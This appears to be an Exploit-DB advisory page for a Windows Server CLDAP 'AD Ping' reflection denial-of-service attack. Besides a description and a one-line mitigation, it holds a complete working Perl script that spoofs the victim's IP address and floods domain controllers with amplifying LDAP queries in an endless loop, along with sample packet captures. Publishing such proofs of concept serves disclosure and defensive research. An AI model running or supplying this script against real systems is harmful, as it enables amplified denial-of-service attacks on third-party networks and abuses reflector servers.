MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC

vendor:

Windows Server

by:

Todor Donev

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: Windows Server

Affected Version From: MS Windows Server 2008/2008 R2/ 2012/2012 R2/

Affected Version To: MS Windows Server 2016

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2016

MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP “AD Ping”) query reflection DoS PoC

The attacker sends a simple query to a vulnerable reflector supporting the Connectionless LDAP service (CLDAP) and using address spoofing makes it appear to originate from the intended victim. The CLDAP service responds to the spoofed address, sending unwanted network traffic to the attacker’s intended target. Amplification techniques allow bad actors to intensify the size of their attacks, because the responses generated by the LDAP servers are much larger than the attacker’s queries. In this case, the LDAP service responses are capable of reaching very high bandwidth and an average amplification factor of 46x and a peak of 55x has been seen.

Mitigation:

Disable the CLDAP service on the vulnerable server, or restrict access to the service from untrusted networks.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#  MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon 
#  (CLDAP "AD Ping") query reflection DoS PoC
#
#  Copyright 2016 (c) Todor Donev
#  Varna, Bulgaria
#  todor.donev@gmail.com
#  https://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  http://pastebin.com/u/hackerscommunity 
#
#  MS Windows Server 2016       [NOT TESTED !!!]
# 
#  Description:
#  The attacker  sends a simple query to a vulnerable reflector 
#  supporting the Connectionless LDAP service (CLDAP) and using 
#  address spoofing makes it appear to originate from the intended 
#  victim. The CLDAP service responds to the spoofed address, 
#  sending unwanted network traffic to the attacker’s intended target.
# 
#  Amplification techniques allow bad actors to intensify the size 
#  of their attacks, because the responses generated by the LDAP 
#  servers are much larger than the attacker’s queries. In this case, 
#  the LDAP service responses are capable of reaching very high 
#  bandwidth and we have seen an average amplification factor of 
#  46x and a peak of 55x.
#
#
#  Disclaimer:
#  This or previous program is for Educational purpose ONLY. Do not 
#  use it without permission. The usual disclaimer applies, especially 
#  the fact that Todor Donev is not liable for any damages caused by 
#  direct or indirect use of the information or functionality provided 
#  by these programs. The author or any Internet provider bears NO 
#  responsibility for content or misuse of these programs or any 
#  derivatives thereof. By using these programs you accept the fact
#  that any damage (dataloss, system crash, system compromise, etc.) 
#  caused by the use of these programs is not Todor Donev's 
#  responsibility.
#
#  Use at your own risk and educational
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
#  # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
#  [ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
#  [ ======
#  [ Usg: cldapdrdos.pl <ldap server> <target> <port>
#  [ Default port: 389
#  [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
#  [ ======
#  [ <todor.donev@gmail.com> Todor Donev
#  [ Facebook: https://www.facebook.com/ethicalhackerorg
#  [ Website: https://www.ethical-hacker.org/
#  [ Sending CLDAP "AD Ping" packets..
#  ^C
#  # tcpdump -i eth0 -c4 port 389
#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#  00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
#  00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315        ## LOOOL...
#  4 packets captured
#  6 packets received by filter
#  0 packets dropped by kernel
#
#
#
  
use Net::RawIP;

print "[ MS Windows Server 2008/2008 R2/ 2012/2012 R2/ AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usg: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $cldap       = $ARGV[0];
my $target      = $ARGV[1];
my $port        = $ARGV[2] || '389';

die "[ Error: Port must be between 1 and 65535!\n"       if ($port < 1 || $port > 65535);

my $query  = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query    .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query    .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query    .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query    .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query    .= "\x65\x74\x6c\x6f\x67\x6f\x6e";
 
my $sock =  new Net::RawIP({ udp => {} }) or die;
print "[ Sending CLDAP \"AD Ping\" packets..\n";
while () {
                select(undef, undef, undef, 0.40);         # Sleep 400 milliseconds
                $sock->set({  ip =>  { saddr  => $target, daddr => $cldap},
                             udp =>  { source => 31337,   dest  => $port, data => $query} });
                $sock->send;
}